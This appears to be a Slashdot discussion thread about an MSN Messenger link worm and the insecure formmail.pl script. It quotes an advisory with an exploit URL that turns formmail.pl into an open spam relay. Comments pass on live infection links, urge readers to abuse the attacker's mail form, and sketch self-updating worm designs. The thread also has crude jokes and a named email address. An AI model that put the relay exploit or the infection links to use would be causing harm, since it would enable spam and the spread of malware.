Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Another site

http://www.angelfire.com/zine2/me1 . It appears to launch a fake error page.

formmail.pl

[TheFlu]

Just an FYI about the lack of security on older versions of formmail.pl You should replace the exploitable version, if you are using it yourself.

Formmail.pl Can Be Used As An Open Mail Relay

Summary
The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable host as mail relays.
This vulnerability has already been exploit by spammers in many installations of Formmail.pl.

Details
Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program two distribute their email (SPAM).

Exploit:
A URL such as the following:
http://www.example.com/cgi-bin/FormMail.pl? recipient=email@address-to-spam.com&message= Proof%20that%20FormMail.pl%20can%20be%20used%20to% 20send%20anonymous%20spam.

Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.

Workaround:
1. Remove your formmail.pl script until the author provides a fix.
or:
2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.

Re:formmail.pl

[vtweb]

There are active search-bots, hunting for instances of formmail.pl on random domains, and testing them for open relays. Check your serverlogs, and you will find that the test request has the URL being tested repeated within the subject, so the email discovering a vulnerable script delivers the URL for further exploits.

Renaming formmail.pl to anything else, such as formsender.pl, will thwart most of these
search-and-exploit processes.

Re:formmail.pl

There is a fix in the latest version of Formail.pl. It only allows mail to be sent to domains that are configured in to the scripts config lines.

Although I wouldn't recommend using this script to begin with. <?php mail($duh, $duh, $duh); ?> PHP is a good thing.

Re:formmail.pl

[proub]

Workaround 3:

Replace FormMail.PL with the more-secure, more-robust drop-in replacement from the nms-cgi project. Still free, same config variables, just works better.

Disclaimer: I'm a contributor to the project, FormMail.PL in particular.

-paul

Re:formmail.pl

[brain159]

*nod*, I've noticed this recently (don't have formmail.pl on my site, but I check up on 404s in my logs out of habit), and I posted bits above. now I'll tip off the nice support dude at my cheap webhost company I use so they can't claim not to know...

Re:formmail.pl

DUDE, nms rawks, formmail.pl and matt's dicks sucxors

Re:formmail.pl

[babbage]

That, or replace the script with the drop-in replacements being offered by NMS. The scripts they're developing, including one that does FormMail.pl's job, are professionally developed versions of Matt Wright's scripts but with much better security & robustness, while not requiring you to install any other libraries or do any setup more advanced than setting a few variables at the top of the script. Good stuff.

Re:formmail.pl

[babbage]

As I understand it, Matt Wright has indicated that he doesn't have much interest in updating his old software anymore, so "official" bugfixes are unlikely to be forthcoming. As another commenter noted, the NMS group is working on a suite of dropin replacements for each of the scripts that Matt wrote years ago, and among them is a very good replacement for FormMail.pl. These newer scripts are being developed with security and robustness in mind from the ground up.

Even in cases where it might be safer & more efficient to use libraries from CPAN, the NMS group has deliberately decided to not make use of these libraries, so that novice devlopers could make use of these more reliable scripts without having to perform any configuration more advanced than setting a few variables and writing a little bit of HTML (which, presumably, they'll be more comfortable with anyway).

Exploits like this are exactly why people should migrate the old Matt Wright code to NMS, which can be dropped in and up & running very quickly. It's easy, and it's much safer. It's the right thing to do.

Re:formmail.pl

[shogun]

I've had the same problem with a FormMail.pl installed around here. IT already had the referer check etc in it but that wasn't enough as you've stated above. What I ended up doing was putting in a recipient check, the script is only meant to be used by local (to the domain) people so they can get feedback from their webpages so I just made sure that the recipient was in the format of *@. Spammers would only be likely to able to use the script in the tiny percentage of cases where their spam victims' addressess happen to be in this domain.

Re:formmail.pl

[zeugma-amp]

Interesting. I just looked through the past few days worth of errorlogs that I have on hand, and find nothing for formmail.pl, but did see 4601 requests for cmd.exe

Re:formmail.pl

The author has provided a fix for your accusation that it can be used as an open mail relay. August 3, 2001, version 1.9. It includes a way to restrict recipients of the e-mail based on regular expressions.

http://www.worldwidemart.com/scripts/

Re:formmail.pl

Matt has updated his script in August of last year after a website I host (dailywav.com) was barraged with tons of attempts to spam through it.

I diagnosed the problem and forwarded the results into him. His latest version 1.9 fixes the issue in the FormMail CGI script, but most ISPs (mine included) aren't interested in fixing it so they leave it.

My version of the script just ignores attempts whereas Matt's politely denies them.

Re:No DNS Record? (Geeky Observations)

[suwain_2]

Actually... My DNS doesn't suck, it's me. :-[

I, in my stupidity, kept the "www." on the front, even though it shouldn't have been. :)

Re:Well, that's one less effectual site for vector

[JDizzy]

Somebody mod this parent as "funny", or "underated" because the authore has a point, the slashdot effect should sufic to kill any of the infection sites, and with a high degree of impact.

Re:Gee...

[woodstok]

Actually if you read the EULA for windows nt it says that its not to be used at hospitals in life-preserving machines, nuclear plants and such. Not only did God forbid Microsoft, they actually listened :D

It could be worse...

[Cowculator]

"Go To http://www.goatse.cx NoW !!!"

Imagine if your friends suddenly knew not only that you were gullible enough to fall for a virus like that, but that you had seen that site...

Re:It could be worse...

[Glorat]

*Almost* tempted to Troll mod this one just for the sake of virgin newbies in Slashdot. But I'll let ya off just this once =P

Re:It could be worse...

[BlowCat]

What are you taking about?
goatse.cx is down since February 2 or so :-(
Haven't you noticed?

Re:It could be worse...

Works for me!

(Or is that my local cache?)

Re:It could be worse...

[shogun]

Yeah I noticed, my squid acl rules that were blocking it were timing out in dns and making the proxy take ages to start. But never fear you can still get at goatse.cx with the Way Back Machine!

So THAT's where the formmail.pl requests

[SCHecklerX]

are from!!!

I know that formmail.pl has some vulnerabilities, and figured people were just probing me.

This would explain where it is coming from. Add this to the code red etc that my poor little web server on DSL has to deal with :(

possibly try

[Papst]

whois masenko-media.net

Warhol Virus

[Metrollica]

To me this sounds like Code Red, only speeded up so it could do a lot more scans in a much shorter period of time and infect many more computers. The author must be a bit more experienced than the author of Code Red because they have built in multithreading which wasn't in Code Red. This makes it possible to probe and attack multiple machines at once and even begins by attacking a list of 50,000 machines known to have good internet connections.

Re:Gee...

[Cally]

Well this is Waaaay off-topic... but WTF ;)

Is this really a surprise? God forbid Microsoft ever tried to make medical equipment.

According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thing slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )

Have any A/V Companies...

[lblack]

Have any A/V companies deployed products to protect against instant messaging vulnerabilities? I know that Bitdefender have a product that helps to increase your security when running such services, but I haven't heard of similar things from Norton/McAffee.

I always thought this was kinda silly, waiting for the horse to leave before closing the stable. Did anybody not view Instant Messenger traffic, especially once it got into a high level of file transfer interaction, as not being a platform for the deployment of viruses?

Still, this is a social engineering thing more than it is anything else. It's not even really a virus -- it's a piece of destructive code delivered via social engineering. It is not really self-propogating, though, in that it requires the server-side in order to be malicious, or do anything at all.

That seems to me to be stretching "virus" a bit. Maybe "viral meme"? I agree it does spread a bit like a virus, but it actually requires fetching external information.

-l

P.S. Bitdefender are beta'ing a Linux product, by the way. It's not Open, but the beta is a free (as in beer) download. Disclaimer: I'm a fan of that company. ;)

Re:Have any A/V Companies...

[doorbot.com]

Considering IM clients are very rarely work-related, I don't see why a company should need to protect against it. They should be limiting what crap you install on your workstation, with AIM/MSN messenger/Yahoo messenger/etc being one of them. Of course this would be convered under corporate policies, and should be enforced.

Re:Have any A/V Companies...

[AnotherBlackHat]

I like the idea of third party protection for windows apps, but not for networking - I want protection for the file system. Imagine something like Zone alarm that pops up a dialog box asking if it's ok to let $app [read/write] files in $directory [never|once|today|always]?

-- Our bits are better, they're gold plated.

Re:Have any A/V Companies...

[lblack]

Yes, but IM software is very common on home machines, and home machines with big fat 24/7 DSL/Cable can be used in DDOS against corporate networks.

So, you see, the issue isn't a corporate security package -- as you mention, the need for this is obviated by corporate policies. It's the need to have an easy-to-use method of protecting home users, so they aren't co-opted into doing nasty things to my webserver. ;)

-l

Re:Well, that's one less effectual site for vector

So, becuase the site was posted on /. it went down. And therefore the virus cant spread. I do believe this is the first *POSITIVE* application of a /.ing ever.

Re:No DNS Record? (Geeky Observations)

Amazingly, the address looks like it is legit.

Re:No DNS Record? (Geeky Observations)

[dpu]

i hope you don't talk that way to your (unfortunate) kids when they make a mistake.

go to the web site i dare you :)

how many linux users have actually went to the web site just for fun????

Sends mail too .. email address harvesting?

[Wizard+of+OS]

Look closely:

<input type="hidden" name="recipient" value=mmargae@wanadoo.nl" ID="Hidden5">

I think somebody forgot that HTML source can be viewed ...

The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.

Re:Sends mail too .. email address harvesting?

[m0sh3]

Well, maybe it's for mailbombing purposes..

Re:Sends mail too .. email address harvesting?

[Quizme2000]

I was wondering why that domain name was port scanning my servers.

Re:Sends mail too .. email address harvesting?

[ethereal]

I've been seeing scans from wanadoo.fr for weeks, wonder if it's the same outfit?

Re:Sends mail too .. email address harvesting?

[Tha_Zanthrax]

Probably a scriptkiddie, look at http://www.wanadoo.nl/.
It's nothing special, they provide free internet-access in Holland

Re:Sends mail too .. email address harvesting?

[pyz]

If mmargae@wanadoo.nl is this user's email address, then
home.wanadoo.nl/mmargae/
is the user's homepage. It's broken, though.

cheers

pyz

Re:Sends mail too .. email address harvesting?

[ConsumedByTV]

I Get that all the time as well, mostly anonymous connections to my ftp server or to my webserver. What services of interest are you running in contrast with my ftp and web?

Re:Sends mail too .. email address harvesting?

[ethereal]

I'm running the same services. I believe wanadoo is one of the most frequent scanners listed on dshield.org, or at least they were a month or two ago.

Re:Sends mail too .. email address harvesting?

I live in Holland, wanadoo is a big company. Apart from free access there is also Euronet and cable (NOT FREE). This person has a email adres @ casema.net (this is the cable company, hence
no free access). Probably he did something to piss the maker of this thingie off.

Re:Sends mail too .. email address harvesting?

[ConsumedByTV]

Wonderful, I wonder which corp that is?

Anyway, in reference to your sig, the second time I read that article it was to a group of about hundred people. Talk about horrid truth.

Oops

[Eric+Damron]

I just copied and pasted part of this story into an outlook email and sent it to our staff warning them of the problem. The address to the masenko-media site came out as a URL. I wonder how many users will click it?

Why this is news

[jeff13]

People keep going on (posting here that is) as if this is some sort of sensationalization of Microsoft security issues. As if other media outlets jump on Microsoft like vultures. Well, wake up, they don't (imho). The 'straight' media tends to avoid bad business news, especially given the danger of being sued by the most politically powerful, media powerful, and just plain rich powerful, software company around. Hmmm, AOL/Time don't count right?

Just because it's the latest #@#k up from Microsoft doesn't deminish it's importance as news.

How many times have I shocked an Internet user (years of tech support, I'm so bitter!) by exploiting IExploder sillyness and effectively crack the lusers OS? They were none to pleased, I have to say. It's not like I can even code really, I'm a moron with programming. But if I can do it...

And it's better to find out about these things in the news, not the hard way!

Erlang Virus Propagation System

"A fully coordinated worm, where the worms explicitly coordinate their attack on the network, is a theoretical possibility but has not been seen in practice due to the difficulty in coding and coordinating the worms."

Obviously the author has not heard of the interpreted, functional programming language Erlang. It can be best described as "The Borg" and has language level support for things like automatic resource discovery, live updates of software modules and distributed databases. There are binaries available for many architectures.

An attack platform written in this language has the potential to be utterly devastating. Imagine, all of the infected nodes know about all of the other nodes. You have a distributed database containing information on exploits and probes for various computer systems that can be updated on the fly as new exploits are discovered. Even the code for the platform itself can be updated while the system is running.

As I recall, there was a story on /. some time ago about the impossibility of removing viruses from a computer network without shutting the network down under certain conditions.

Why hasn't this happened yet? It surely isn't for lack of expertise. No need to worry though, all the legislation that's been passed regarding computer crime prevents this sort of thing, right?!

Re:Erlang Virus Propagation System

[_Knots]

What about self-updating viruses? Take Code-Red, add already-infected detection so Target knows when Infector is scanning it, then Infector checks its local database of attacks and asks Target if it 1) has additional, 2) would like one of the ones it doesn't have that Infector does and 3) for success-statistics on every known method (just two counters, success / total attempts). If the success / total ratio goes too low, the virus could shed that attack, assuming that it has become patched everywhere. Shedding might be done in a non-probabilistic manner so that not all the viruses shed an attack (there will be *somebody*).

Additionally, using non-random address generators could help (OH, look, I'm on 192.168.0.10/24... let's attack all the 192.168.0.* hosts first) and get some interesting virus (beowulf? Sorry...) clusters up.

Comments?

--Knots

Microsoft and Viruses

[wazootyman]

I don't know what's worse. The fact that you guys can nitpick so much, or the fact that I take the time to read it. You do realize that if linux apps were as mainstream and easy to use as Microsoft products, they'd be exploited just as much, right? Oh wait, I forgot. Those programmers who make 6 figures at Microsoft are just script kiddies who can't code. I'm sure the typical open source programmer could blow any of them away. I'm sure...

Month half over

[3ryon]

I guess they will need the whole month to 'focus on security'. Good thing they budgeted so much time.

For all you Primus fans

[scorcherer]

"It's alright to fear the worm."

(Prof. Nutbutter / Tales from the Punchbowl)

Re:Well, that's one less effectual site for vector

[xintegerx]

Isn't it possible that the virus itself flooded the website with many hits to it coming from just instant messenger? :)

Plus, since the topic author knew the exact URL from somewhere, it must have already been fairly widespread before it got here :)

Re:No DNS Record? (Geeky Observations)

I just punch mine in the face

What is .NET?

[bahwi]

What is .NET?

Well, here's the answer. =)

That site is so...

[switcha]

Dude, that site is soooo Slashdotted.

Re:That site is so...

[thilmony]

google cache "works"

question

[samabdulla]

i copied this script and put it up on my website www.sa misgod.com/cool.html but its not working...is it a server side script?

NOT a "Warhol Worm", just topologically aware

[nweaver]

Warhol style worms are purely active worms, which require no human intervention to spread. This worm sounds like an intervention-required worm/trojan (like a mailworm) but which spreads through MSN instead of email.

It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.

For those who are interested, a more formal analysis is available Here, a paper I submitted to Usenix Security on the subject.

Re:NOT a "Warhol Worm", just topologically aware

[Shiny+Metal+S.]

It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.

What if that Javascript code was sent in HTML email? Would it be run as well? Outlook uses IE to render HTML, right?

I can't check it by myself (I don't use Microsoft software), but I'm curious.

I hope that the virus writers...

[Rune69]

...are aware of the seriousness of their acts.
Don't they know that virus making will soon be considered a hate crime?

On another note, I wonder how many victims of the Warhol virus also caught this recent virus.

In related news

[Metrollica]

The "Don't Fucking Open Me!" virus is still spreading havoc.

E-mail inboxes were flooded with messages this morning as a new virus quickly spread around the world. Dubbed "Don't Fucking Open Me" by anti-virus researchers, the infected e-mail follows a similar course to other viruses and replicates by sending itself out to everyone in the infected computer's Outlook and Outlook Express address book. The virus also contains two different payloads: one version formats the hard drive and displays the message "This is for your own good"; the other payload creates random Power Point presentations in the "My Documents" folder.

Savvy users can spot the virus by its subject which is "Don't Fucking Open Me" or by the attachment which is entitled "Don't_Fucking_Open_Me.exe".

"This virus tricks the user with an old psychological tactic called reverse psychology. Apparently the curiosity created by the message has been too much for thousands of users," said anti-virus researcher Bob Atibop. According to Atibop, this isn't the first time reverse psychology has been used. In 1998, the "Don't Pee on Your Keyboard" worm caused a flood of damage.

Researchers have seen large infection among AOL users and middle managers, the two largest concentrations of naive and inept computer users.

Claudia Hawkins who was infected by the virus said, "My son told me not to open attachments, but.... I mean my MOM sent it! What if she was hurt?!?"

Another infected user too embarrassed to reveal his name said, "I thought that there was no way that this could be a virus. What kind of stupid idiot virus writer would put a dumb title on it like that? No one would ever open something that says not to open it. The virus would never spread defeating the whole purpose of it."

Experts advise extreme caution when opening messages entitled "Don't Fucking Open Me" or "Click Here for Cash and Virus Infection".

A bunch of "old" features.

[Bender+Unit+22]

Well, there has been a couple of well known "features" for some time. All you needed was to insert some code on your site and you could see who visited you on the site and who their "Friends" were. on all sites this was only their Messenger name, including the ones on your contact list.

Then there is some hardcoded urls into Messenger that allow certain sites obtain your email adr. and the emails adr. of the people in your contact list. thise sites include microsoft.com, hotmail.com.

Hmm thinking about whipping up an example on my website,, heh could be fun.

So many holes, so little time

[poemofatic]

MS wrote IE.

MS wrote Messenger.

MS wants to bundle the two together into their OS.

A browser is not a server.

Linux is a kernel, not a distro.


Your comment has too few characters per line (currently 9.1).

This got me thinking

[t_allardyce]

Before, i was convinced that Microsoft's obsession with closed source was an evil plan to allow them to hide malicious code in Windows so they could take over computers/internet/world. Now i have come to realise, that the real reason is because they are so incompetent that they don't want anyone to see the crap, uncommented, un-nested, spaghetti code that they call software, for risk of other corporations laughing at them, like a lecturer laughs at the bottom-of-the-class student who submits their half-assed assignment code that looks like a 3-year old wrote it (i'm sure many 3 year olds could actually write decent code :) If anyone witnessed what was really in the operating system their business was relying on, they would rather have BBC BASIC (oh, wait, VB _is_ BASIC rofl :)

Now i have realised that Microsoft couldn't plant code in Windows to take over the world, because they can't code, and are too busy writing software that will try to stop your computer working if you change more than 5 bits of hardware.

who would click on it?

[FCAdcock]

Now who in the heck follows links from random people that they don't know off of the internet? If you ask me, these are getting what their un-intelligence deserves.

Re:who would click on it?

wow some ppl really can't be arse to read more then the headline can they?

People clicking on links...

[Macrobat]

True story:

I just visited my friend's brother to pick up a used telescope. His brother's system is down because he clicked on a link in an email that said something like "pictures of me naked."

When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!"

Didn't know what to say to that.

Re:People clicking on links...

I'd wash that telescope before I put my eye to it. I get the feeling your friend's brother might be using it for something besides stargazing...

Re:People clicking on links...

[Radical+Rad]

When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!"

The naked girl pictures are probably from a 46 year old fat, balding, gay man who is just trying to get your friends brother to send back pictures of himself!

Re:People clicking on links...

[shaunak]

"When I told him that anything like that was obviously a worm or some kind of scam, he responded: "But it was from a girl who DOES send me pictures of herself naked!""

It's a good thing you didn't reveal her email address.
Aside from privacy issues, I'm sure the poor lass would stop using her computer if she recieved an email from each and every /.er requesting her naked pics - would that be the first /. effect for email addresses?
(Psst - you could send her email addy just to me, you know - I'll keep it a secret - I swear - on my honor ;)) Just kidding - Mod me down, Scotty.

Re:People clicking on links...

[roystgnr]

Didn't know what to say to that.

Well, duh. Two words:

"Prove it!"

Re:People clicking on links...

> > Didn't know what to say to that.
> Well, duh. Two words:
> "Prove it!"

You forgot to continue it with:

"on www.flashyourrack.com"

We now return you to your scheduled MS flamefests.

Where is Windows Update?

[weave]

I went to Windows Update this morning looking to update my IE using that uber patch. Said no critical updates. I had to go to technet and download the patch from there.

Why the hell does it take Microsoft so long to get patches onto Windows Update, which most users use to get their updates (those that look)?

Like, when I heard about the SNMP problem yesterday, I went to rhn.redhat.com, found an update for snmp, did a select all for all my linux boxes i adminster at work, scheduled them to be updated, done. I got look for an SNMP update for my Windows servers, none found.

It's just annoying... Microsoft has billions for R&D, takes weeks to get a patch out on Windows update, yet some kid can write autorpm that does the same kinda thing for linux in his spare time...

Re:Where is Windows Update?

[torklugnutz]

I can't even get onto WindowsUpdate with my win2k or winxp machines. I tried off and on for most of saturday and eventually it worked. Now, I try again, and I'm getting the same old Can't Find Server message. Anyone else having problems with the site, or is it just me?

Re:Where is Windows Update?

[citking]

Even better yet, since MS has decided to put off new work until it can fix their buggy, already-released programs, you'd think this would get some sort of priority.

Personally, I think I'll stick with Trillian. It so much easier.

Re:Where is Windows Update?

[steve_l]

me too. Been probing to see what the lag is between a major bug report and XP update having it. Last time it was 48 hours, this time the site's DNS record is missing.

maybe it's down in this four week rush to get security right in windows.

Re:Where is Windows Update?

[WhiteKnight07]

The "Uber Patch" is available for download here.

Re:Where is Windows Update?

[aunitt]

It's even worse than that. I've gone to the bother of downloading the patch for IE6 from Technet (quite a lot of bother as it's 2Mb+ and I've only got a slow connection), and I've tried to install it and it tells me "Sorry this patch if for IE6" - I do have IE6 installed.

Oh well buggered by Bill again. :-(

The joys or irony...

[wrinkledshirt]

I hate Microsoft, but my favourite part isn't this story. My favourite part is the link directly under it.

< What is .NET? | Linus Merges ALSA Into 2.5.4 >

You gotcher answer, folks.

Re:CAPITALS ARE GOOD

DR MDRTR PRSNS T S JST M
JNS. D NT KNW WHY Y R
CLLNG M FFTPC BCS S
THNK TH TPC S MCRSFT
NSTNT MSSNGR ND M WRTNG
T TLL LL F SLSHDT THT W F
FGHNSTN PPL RGRT THS
TRRBL TTCK GNST TH MRCN
PPL ND THR MSSNGNG SYSTM.
THT S TH TPC ND THT S LL
WSHD T SY.

YR FRND,
&nbsp-JNS.

Re:Gee...

[Frater+219]

According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thing slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )

A quick Google search for "risks digest eye surgery" yields this link. Pretty frightening stuff, and it does show how well many users have become trained to treat error conditions as part of the normal behavior of computer operating systems and applications.

Use Trillian

[GooseKirk]

YES! That's excellent advice. I removed MS Messenger and installed Trillian, and I can't remember the last time I was so completely thrilled with a piece of software. Use Trillian. It does AIM, ICQ, MSN, Yahoo, and IRC, it's free, it looks awesome, it's updated often, it's easy to use, it works well, and did I mention it looks awesome? If there's any reason to use any other IM client, I don't know what it is...

Re:Use Trillian

[Yottabyte84]

If there's any reason to use any other IM client, I don't know what it is...

Here are 2.

1.) If you don't use Windows

2.) You use some of the special features that the official client has but trillian does not.

Yahoo too possibly

[ZaneMcAuley]

I already renamed my HTML tags that i think are dangerous to and currently used by booters to cause an AV on ypager.exe with a hex editor.

I might do the same with MSN now.

I was told there is a Yahoo messenger virus doin the rounds too, but i havnt seen it (yet).

Re:Well, that's one less effectual site for vector

[silicon_synapse]

Yes, but if it was an organized effort directed at the site for the express purpose of bringing it down, the guys at OSDN could be held liable for a DDoS.

Don't click on links in article description!

[ahde]

they're ActiveX viruses, and will do more than send MSN Messenges to your friends if you're using IE

this is nothing new

MSN Messenger viruses have been around for a while. A friend of mine got infected and it kept trying to make it look like she was trying to send me her new photos (which were infact the virus's .exe).
MS didn't design MSN Messenger with much thought to viruses. No kudos going their way over that..

Re:Well, that's one less effectual site for vector

Woo.. You used organized, and OSDN in the same sentance! That's pretty funny stuff!

angelfire's responce to the /. effect

[erobertstad]

[angelfire]

Temporarily Unavailable

The Angelfire site you are trying to reach has been temporarily suspended due to excessive bandwidth consumption.

The site will be available again in approximately 2 hours!

Are you the owner of this site?

To check your daily bandwidth usage, click here.

To obtain a higher bandwidth limit, click here.

Careful with your statistics

[Random+Bystander]

Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.

Firstly, statistics, even the 'raw' ones provided by Netcraft, can be read with any spin you choose to apply (as you have done)

Secondly, you're not looking at sites that are active, just ones that have a webserver running. This includes about 2/3 of machines that aren't actually active servers. Check the figures yourself. 36.7 million polled, 13-ish million active. The more relevant graph is the second one provided, showing the count and growth of active servers, not just plain numbers of them.

Know how to stop IE from launching MSN Msgr?

[HuvahCraftah]

It really annoys me, I log into hotmail to check my mail and it launches MSN! I only keep it around in case Trillian decides to crap out on me.

Is there a way to keep IE from launching it without totally breaking MSN Messenger?

Re:Know how to stop IE from launching MSN Msgr?

[mech9t8]

You can delete the references to the Messenger object in the registry. It leaves Messenger unaffected but disables the web object.

Remove the following registry keys:

HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE0-11d2-A441 -0 0C04F795683}
HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D94 -0 000F875C541}
HKEY_CLASSES_ROOT\Messenger.MsgrObject

and there's another Messenger.* object, but I forget what it was... but if you get the CLSIDs that should cover it...

You can just rename them to backup_FB7199AB-79BF-11d2-8D94-0000F875C541 or whatever if you want to be cautious.

You'll need to remove them again if you upgrade or reinstall - it'll put the references back.

Re:CAPITALS ARE GOOD

[Delusionner]

I have enough of capitals. they seem like you're screaming everything. Plus, I hate my COBOL! course. This language is so old it looks like it's been designed to make grandma's weaver work. Anyways. About that "virus" I hope it doesn't do anything more than messaging poeple. t'would suck to install once more that (X)tra (P)epperoni. I think I wouldn't re-install it. If it's f@ked up because of some lame microsoft security bug well it'll go down and crash good time HAHAHAHAHAHAHA! (oops caps again).

Most of Matt Wright's scripts are unsafe

They are easy to install and convenient. Therefore people think they are good. But they are not, they are badly written.

For details you can ask for details on PerlMonks.

Re:Gee...

[generic-man]

So according to the issue of RISKS Digest, this third-party program called "Ladarvision" kept on throwing very odd error messages internal to the program, and the tech was trained to hit RETURN. How is this Microsoft's fault?

Windows 95 is pretty stable if you use it as a single-tasking OS. I mean, there are still point-of-sale systems running DOS, and that provides just slightly less memory protection than Windows 95 does. Just don't blame the OS vendor for a shoddily-written third-party program.

Where does that implant go?????

[bubbha]

....your forehead or your foreskin.....

masenko-media.net

WHOIS information for masenko-media.net:

The Data in Network Solutions' WHOIS database is provided by Network
Solutions for information purposes, and to assist persons in obtaining
information about or related to a domain name registration record.
Network Solutions does not guarantee its accuracy. By submitting a
WHOIS query, you agree that you will use this Data only for lawful
purposes and that, under no circumstances will you use this Data to:
(1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail
(spam); or (2) enable high volume, automated, electronic processes
that apply to Network Solutions (or its systems). Network Solutions
reserves the right to modify these terms at any time. By submitting
this query, you agree to abide by this policy.

The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.

Registrant:
Net Crater

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM
The previous information has been obtained either directly from the
registrant or a registrar of the domain name other than Network Solutions.
Network Solutions, therefore, does not guarantee its accuracy or
completeness.

source code

[daverr]

where can I get the source code? I love learning about how virus' work and how they control apps remotely

Re:source code

here is another page with what seems to be a different version of the code. please dont click the link. i did and now i am infected and dont know how to get rid of it. this sucks!

http://users.skynet.be/dark.angel/cool.htm
pleas

Re:COBOL

Why is it being old make it bad?

-AC

Just click this link to send them mail :)

[sh0rtie]

Unhappy ? thanks to the beauty of Matts formail you can mail them by simply clicking this link :)

Click here to mail them :)

Re:Just click this link to send them mail :)

[Noodleroni]

Just click the link, a page pops up that says slashdot.org isn't an allowed referrer. So, just click in the location bar and press enter. They get a stupidly beautiful message :-P

Ok, now what?

So, I clicked a link before reading /. (what was I thinking??), and I am guessing I now have the 'virus'. Downloading the update for Ie will fix this? Or do I have to manually go in and clean files? Thanks for any help.

Oops shame the refferer check is on but. . . . .

Copy and paste works just fine ;)

When it rains, it pours?

[Keith+Russell]

It's 9:35 pm EST, and Windows Update seems to have fallen off the DNS. Interesting timing, that. Is it just my ISP? Microsoft forget to pay its bills, again? Or is something more sinister at work?

Maybe it's just me, but my inner conspiracy theorist is telling me that someone evil enough to start an IM worm using a patchable exploit could also be evil enough to cut off the first place people would go to look for that patch.

Re:When it rains, it pours?

[quan74]

No, it's not just you, been trying to patch a system at work for a while. If you're looking for the IE 5.x-6 cumalitive patches released yesterday try here:

http://www.microsoft.com/windows/ie/downloads/cr it ical/q316059/default.asp

As of 10:30 PM EST it was accesible.

Q

Duhhhh... Why not...

[Shuh]

Why not add a Javascript ticker-tape display to Slashdot so we can just watch the M$ virii/security-holes flash by like so many stock market reports?

cheap shot

[MaxwellsSilverHammer]

Was this before or after they investigated the code for security problems per the new order?

Javascript flame

[Sloppy]

I don't get it... why do people whine about this? Just disable Javascript. Everything worthwhile on the web will still work just fine; it'll just go faster and screw you less often. Javascript should be extinct by now: Everyone who uses it hates it, people who turn it off are happier (I have never seen those x10 pop-under ads that everyone talks about), and it doesn't do anything useful. It's all pain with no gain.

Web browsers shouldn't even include it anymore.

Re:Javascript flame

Without Javascript how can I access my daily dose of popup porn?

Re:Javascript flame

[kisrael]

Others have wondered if this is a troll...I think you may have a point. I think that you're wrong, but I think you have a point.

I make a lot of my own cgi scripts for personal use, and javascript helps *a lot*, from selecting multiple checkboxes at once, to a way to fake combo boxes where you can select from a set of values or enter a new one. And many, many sites depend on it...though I think many fewer legitimate sites would need the window.open() function if there had been a standard for sizing a window built into the A HREF tag.... (I hate those, 'cause I'm used to right clicking to open in new window, and they hardly ever code that right so that right clicking still works...)

Re:Javascript flame

[tomgilder]

I make a lot of my own cgi scripts for personal use, and javascript helps *a lot*

Maybe so, but the problem is web developers relying on scripting being on the client. I've made a series of articles on my site, showing how developers can better provide for users with no scripting.

Re:Javascript flame

[SoSueMe]

Thank you.
I deal with several Web Developers who rely heavily on Javascripting.
I am so tired of hearing "It can't be done any other way".
The current "standards" we are supposed to follow dictate functionality has to be maintainded with javascripting turned off.
When reminded of this, they say "Why would you turn it off?"
Perhaps I'll have to insist they all read Slashdot more often.

It's a shame Goatse.cx is gone :(

[gulfan]

.CX killed his domain name because they didn't agree with the content they had on that site.

Re:It's a shame Goatse.cx is gone :(

On the positive site, the guy who used to be featured on goatse.cx gave an interview where he admits some extremely interesting facts:

1. He really enjoys doing it
2. He is not a gay
3. He is French

Re:It's a shame Goatse.cx is gone :(

He is French
>

That explains sooooooo much.

It's evolved

[LichP]

The version I got reads

URGENT - Go to http://users.skynet.be/dark.angel/cool.htm

I went, but Mozilla crashed on accessing the site so I wasn't affected. Then I got a clone message, and the evil purpose rapdily became clear. Anyone peaked at this to see if the code is essentially the same?

--
From Phil

Re:It's evolved

[veeoh]

